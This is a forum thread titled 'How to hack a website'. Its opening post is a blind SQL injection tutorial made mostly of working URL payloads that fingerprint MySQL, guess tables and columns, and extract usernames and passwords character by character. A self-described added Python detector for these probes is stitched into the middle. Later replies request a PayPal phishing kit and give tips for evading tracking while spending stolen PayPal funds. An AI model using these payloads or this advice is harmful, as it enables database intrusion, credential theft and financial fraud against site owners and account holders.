How to hack a website [SQL Injection]

This is a discussion on How to hack a website [SQL Injection] within the Real Life Hacks board, part of the General category.

  1. #1 Mihailo665 (Member, Serbia, joined Jul 2010)

    How to hack a website [SQL Injection]

    NOTE: This is for people that already know some basics about SQL injection! I suggest you also get some snacks cuz it's a pretty big post!
    For my tutorial I will use the following site as an example:

    http://www.site.com/news.php?id=5

    When we execute this, we see some page with articles, pictures, etc.

    Then, when we want to test it for a blind SQL injection attack:

    http://www.site.com/news.php?id=5 and 1=1

    <--- this is always true, and the page loads normally, that's OK.
    Now the real test:

    http://www.site.com/news.php?id=5 and 1=2

    <--- this is false

    So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection.

    1) Get the MySQL version

    To get the version in a blind attack we use substring,

    i.e.

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

    This should return TRUE if the MySQL version is 4.

    Replace 4 with 5, and if the query returns TRUE then the version is 5.

    i.e.

    http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

    2) Test if subselect works

    When select doesn't work, we use a subselect,

    i.e.

    http://www.site.com/news.php?id=5 and (select 1)=1

    If the page loads normally then subselects work.

    Then we're going to see if we have access to mysql.user,

    i.e.

    http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

    If the page loads normally we have access to mysql.user, and later we can pull some passwords using the load_file() function and OUTFILE.

    3) Check table and column names

    This is the part where guessing is your best friend,

    i.e.

    http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

    (With limit 0,1 our query here returns 1 row of data, because a subselect returns only 1 row; this is very important.)

    Then if the page loads normally without content missing, the table users exists.
    If you get FALSE (some article missing), just change the table name until you guess the right one.

    Let's say that we have found that the table name is users; now what we need is the column name.

    The same as with the table name, we start guessing. Like I said before, try the common names for columns,

    i.e.

    http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

    If the page loads normally we know that the column name is password (if we get FALSE then try common names or just guess).

    Here we merge 1 with the column password, then substring returns the first character (,1,1).

    4) Pull data from the database

    We found the table users and the columns username and password, so we're going to pull characters from those.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

    OK, this here pulls the first character from the first user in the table users.

    substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value,

    and then we compare it with the greater-than symbol >.

    So if the ASCII value is greater than 80, the page loads normally. (TRUE)

    We keep trying until we get FALSE.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

    We get TRUE, keep incrementing.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

    TRUE again, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    FALSE!!!

    So the first character in username is char(99). Using the ASCII converter we know that char(99) is the letter 'c'.

    Then let's check the second character.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

    Note that I changed ,1,1 to ,2,1 to get the second character. (Now it returns the second character, 1 character in length.)

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

    TRUE, the page loads normally, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

    FALSE, lower number.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

    TRUE, higher.

    http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

    FALSE!!!

    We know that the second character is char(105), and that is 'i'. We have 'ci' so far.

    So keep incrementing until you get to the end. (When >0 returns FALSE we know that we have reached the end.)

    There are some tools for Blind SQL Injection; I think sqlmap is the best, but I'm doing everything manually, because that makes you a better SQL INJECTOR.

    Hope this helped! (Post taken from www.pakcyberarmy.net, not made by me)
    Last edited by Mihailo665; 05-12-2011 at 02:49 PM.
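A defender's view of the same probing sequence, as an added example that is not part of the original post: a small Python log analyzer that parses constructed Apache access-log lines, flags the query patterns walked through above (1=1 / 1=2, @@version, subselects, ascii(substring(...))), and groups the threshold-walking requests into one family per source IP and path. Two distinct response sizes inside such a run is the TRUE/FALSE oracle the post relies on, so that is what analyze() reports. The log lines, the IP address and the minimum run length are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-log lines (not from any real server) mimicking the post's
# probing sequence: 1=1 / 1=2, then ascii(substring(...))>N requests differing only in N.
SAMPLE_LOG = r"""
203.0.113.7 - - [12/May/2011:14:40:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2011:14:40:02 +0000] "GET /news.php?id=5%20and%201%3D1 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2011:14:40:03 +0000] "GET /news.php?id=5%20and%201%3D2 HTTP/1.1" 200 3010
203.0.113.7 - - [12/May/2011:14:40:04 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2011:14:40:05 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E95 HTTP/1.1" 200 5120
203.0.113.7 - - [12/May/2011:14:40:06 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E99 HTTP/1.1" 200 3010
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} (?P<size>\d+|-)')
# Signatures for the probes used in the post, applied to the URL-decoded query string.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "char_extraction": re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I),
}

def parse_line(line):
    # One log line -> ip, path, decoded query and response size (0 when Apache logs "-").
    m = LOG_RE.match(line.strip())
    if not m: return None
    parts = urlsplit(m.group("url"))
    return {"ip": m.group("ip"), "path": parts.path, "query": unquote_plus(parts.query),
            "size": int(m.group("size")) if m.group("size").isdigit() else 0}

def match_signatures(query):
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def family_key(query):
    # Numbers become N so requests differing only in the threshold (>80, >95) or offset fold together.
    return re.sub(r"\d+", "N", re.sub(r"\s+", " ", query.lower())).strip()

def analyze(log_text, min_family=3):
    flagged, families = [], defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec or not (sigs := match_signatures(rec["query"])):
            continue
        rec["signatures"] = sigs
        flagged.append(rec)
        if "char_extraction" in sigs:
            families[(rec["ip"], rec["path"], family_key(rec["query"]))].append(rec["size"])
    # Two distinct response sizes within one run is the TRUE/FALSE oracle the post relies on.
    runs = [{"ip": ip, "path": path, "requests": len(s), "distinct_sizes": len(set(s))}
            for (ip, path, _), s in families.items() if len(s) >= min_family]
    return flagged, runs
```

Feed real access-log contents to analyze() the same way; the response-size split inside a run is the cheapest sign that the oracle actually worked, which is the condition worth alerting on.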

  3. #2 Mihailo665
    I did a lot of editing and forgot to post the link. Still, it was pretty noobish and ye kinda gay. Sorry all for that. Won't happen again.

  4. #3 Mihailo665
    Is there any PayPal phisher tutorial or dl link... PM me if d3scene doesn't allow PayPal hacking stuff... Thank you in advance.

  5. #4 Smoogel (Premium Member, England, joined May 2010)
    Quote Originally Posted by Mihailo665:
    Is there any PayPal phisher tutorial or dl link... PM me if d3scene doesn't allow PayPal hacking stuff... Thank you in advance.
    Hmm, you want a PayPal phisher?

    That's just asking for trouble...

    Perhaps you do not know what you are attempting to step into?

  6. #5 Mihailo665
    Quote Originally Posted by Smoogel:
    Hmm, you want a PayPal phisher?

    That's just asking for trouble...

    Perhaps you do not know what you are attempting to step into?
    I know what I am going to step into. I know the 90% risk and the 10% benefit, but I just need some help on making the phisher for it. I'm having some trouble with adjusting the source from it.

    I know what I'm about to step into.

  8. #6 Idbjorn (Advanced Hacker, joined Apr 2011)
    I've seen a tutorial like this long ago; it doesn't matter who copied who, because SQL injection has been around for a long time. milw0rm was filled with tons of exploits like this before it was shut down. I wouldn't recommend PayPal phishing no matter what is attached to the account; credit cards and bank accounts aren't dumb. Those two alone are very easy to track; maybe if there was money on the account it has potential to be safe, but it is probably a bad idea in the end.

    Quote Originally Posted by Mihailo665:
    I know what I am going to step into. I know the 90% risk and the 10% benefit, but I just need some help on making the phisher for it. I'm having some trouble with adjusting the source from it.

    I know what I'm about to step into.
    You do realize you can be tracked from IP, MAC, cache, cookies, and various other ways, right?

  9. #7 FAlTH (Hacker, joined Mar 2011)
    Quote Originally Posted by Idbjorn:
    I've seen a tutorial like this long ago; it doesn't matter who copied who, because SQL injection has been around for a long time. milw0rm was filled with tons of exploits like this before it was shut down. I wouldn't recommend PayPal phishing no matter what is attached to the account; credit cards and bank accounts aren't dumb. Those two alone are very easy to track; maybe if there was money on the account it has potential to be safe, but it is probably a bad idea in the end.

    You do realize you can be tracked from IP, MAC, cache, cookies, and various other ways, right?
    Don't forget the bank account where you transfer the money to.

  10. #8 Idbjorn
    Quote Originally Posted by FAlTH:
    Don't forget the bank account where you transfer the money to.
    Oh, you would have to be an idiot to transfer the money to your own bank account. But I think you're joking, lol. If anything, spend the money on the PayPal account right away from another computer not using your connection; buying virtual goods from foreign sites not hosted in the U.S. would be the safest route.

  11. #9 Mihailo665
    I do not intend to hack anyone; I just want to annoy my brother and change his password cuz dad just got him $100 on the account! And yeah, I know everything and all the risks.

  12. #10 Mihailo665
    I honestly really dunno where else to post it, sry.
